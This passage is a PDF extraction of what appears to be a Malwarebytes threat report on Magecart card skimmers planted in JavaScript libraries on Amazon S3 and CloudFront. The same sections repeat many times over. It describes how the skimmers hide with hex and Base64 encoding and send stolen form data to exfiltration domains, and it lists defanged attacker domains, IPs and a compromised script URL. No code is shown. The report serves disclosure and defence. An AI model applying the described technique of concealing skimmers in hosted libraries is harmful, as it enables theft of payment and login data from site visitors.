injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 33 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 34 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 35 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 36 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 37 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 38 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 39 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 40 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 41 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 42 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 43 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 44 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 45 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 46 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 47 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 48 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 49 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 50 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 51 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 52 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 53 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 54 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 55 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 56 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 57 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 58 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 59 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 60 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 61 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 62 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 63 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 64 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 65 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 66 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate 